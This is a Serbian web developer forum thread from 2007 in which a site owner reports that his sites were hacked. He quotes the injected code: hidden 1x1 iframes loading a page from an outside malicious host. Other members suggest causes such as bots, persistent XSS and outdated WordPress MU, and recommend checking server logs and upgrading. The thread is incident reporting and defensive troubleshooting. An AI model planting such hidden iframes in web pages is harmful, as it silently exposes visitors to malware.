Hackovanje i <iframe>

Djuki · 05. 06. 2007.

Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.

Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom.

Evo koda koji je ostao na jednoj od stranica:

Kôd:

-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->

Da li znate na koji nacun su hakovali ove sajtove, i da li ovo rade botovi ?

adelante · 05. 06. 2007.

Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.

Ivan · 05. 06. 2007.

Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.

nixa · 05. 06. 2007.

ako koristis smarty pogledaj da li nije malo zastareo

LiquidBrain · 05. 06. 2007.

Ivane, XSS se moze manifestovati samo uz akcije posetilaca.

Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu

Da lici na nekog bot-a, ali
tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima.

Da nisi mozda koristio OScommerce?!?

Pozdrav.

ivanhoe · 05. 06. 2007.

mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..

inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali...

Ivan · 05. 06. 2007.

@LiquidBrain

Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS".

Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa.

O kom software-u je rec ?

Dragan Babić · 06. 06. 2007.

Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).

Djuki · 06. 06. 2007.

Softver je WordPress MU. Jeste, verzija MU-a jeste zastarela, nisma koristio taj softver i eto. Mada su mi hakovali i sajtove sa cistim php i html fajlovima, bez ikakvog CMS-a.

Sad cu da update-ujem software pa ce vidimo kom opanci ...

Ilija Studen · 06. 06. 2007.

Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni.

Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo

Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike

05. 06. 2007.	#1
Djuki profesionalac Professional Datum učlanjenja: 09.06.2005 Lokacija: Pancevo Poruke: 251 Hvala: 60 47 "Hvala" u 34 poruka	Hackovanje i <iframe> Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove. Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom. Evo koda koji je ostao na jednoj od stranica: Kôd: -->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe> <iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ --> Da li znate na koji nacun su hakovali ove sajtove, i da li ovo rade botovi ? __________________ Blog \| Facebook \| Twitter \| PHP Srbija

05. 06. 2007.	#2
adelante član Certified Datum učlanjenja: 07.08.2005 Poruke: 67 Hvala: 15 0 "Hvala" u 0 poruka	Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne. __________________ Online prodavnica rukotvorina

05. 06. 2007.	#3
Ivan Psychedelictrance freak Wrote a book Datum učlanjenja: 04.06.2006 Lokacija: Srbija, Beograd Poruke: 1.008 Hvala: 325 933 "Hvala" u 34 poruka	Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust. __________________ Testiranje bezbednosti web aplikacija

05. 06. 2007.	#4
nixa Nikola Denić Sir Write-a-Lot Datum učlanjenja: 18.05.2005 Lokacija: Beograd Poruke: 3.694 Hvala: 160 458 "Hvala" u 164 poruka	ako koristis smarty pogledaj da li nije malo zastareo __________________ Do not ask yourself what the world needs. Ask yourself what makes you come alive, and then go do that. Because what the world needs is people who have come alive

05. 06. 2007.	#5
LiquidBrain Milan Cvejic Wrote a book Datum učlanjenja: 05.09.2006 Lokacija: Beograd Poruke: 1.241 Hvala: 32 73 "Hvala" u 56 poruka	Ivane, XSS se moze manifestovati samo uz akcije posetilaca. Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu Da lici na nekog bot-a, ali tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima. Da nisi mozda koristio OScommerce?!? Pozdrav. __________________ http://weevify.com Poslednja izmena od LiquidBrain : 05. 06. 2007. u 14:01.

05. 06. 2007.	#6
ivanhoe Ivan Dilber Sir Write-a-Lot Datum učlanjenja: 18.10.2005 Lokacija: Bgd Poruke: 5.320 Hvala: 104 2.344 "Hvala" u 583 poruka	mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom.. inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali... __________________ Leadership is the art of getting people to want to do what you know must be done.

06. 06. 2007.	#8
Dragan Babić Designer guy Wrote a book Datum učlanjenja: 06.06.2005 Lokacija: Novi Sad Poruke: 1.373 Hvala: 55 42 "Hvala" u 22 poruka	Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno). __________________ Plakatt — objavi, razglasi i saznaj za događaje DnevnikEklektika.com \| Sprawsm

06. 06. 2007.	#10
Ilija Studen Direktor Kombinata Invented the damn thing Datum učlanjenja: 07.06.2005 Poruke: 2.669 Hvala: 44 119 "Hvala" u 64 poruka	Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni. Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike __________________ activeCollab - Project Management and Collaboration Tool iz domaće kuhinje \| area51.rs - Blog Poslednja izmena od Ilija Studen : 06. 06. 2007. u 10:17.

Alati teme
Pogledajte verziju za štampanje Pošaljite email-om ovu stranu
Način prikaza
Linearni prikaz Prebacite u hibridni prikaz Prebacite u prikaz po temama

Slične teme
Tema	Početna poruka teme	Forum	Odgovori	Poslednja poruka
Referenca na div koji se nalazi u iframe-u	centaur	(X)HTML, JavaScript, DHTML, XML, CSS	10	10. 09. 2008. 17:33
[JS] HTML kod IFRAME-a	Nemanja Avramović	Sva početnička pitanja	6	14. 03. 2008. 19:50
Iframe i JS	ivanhoe	(X)HTML, JavaScript, DHTML, XML, CSS	5	19. 12. 2006. 21:45
cross-domain scripting i iframe	ivanhoe	(X)HTML, JavaScript, DHTML, XML, CSS	0	06. 05. 2006. 00:12
javascript, iframe i Opera	ivanhoe	(X)HTML, JavaScript, DHTML, XML, CSS	2	28. 04. 2006. 13:21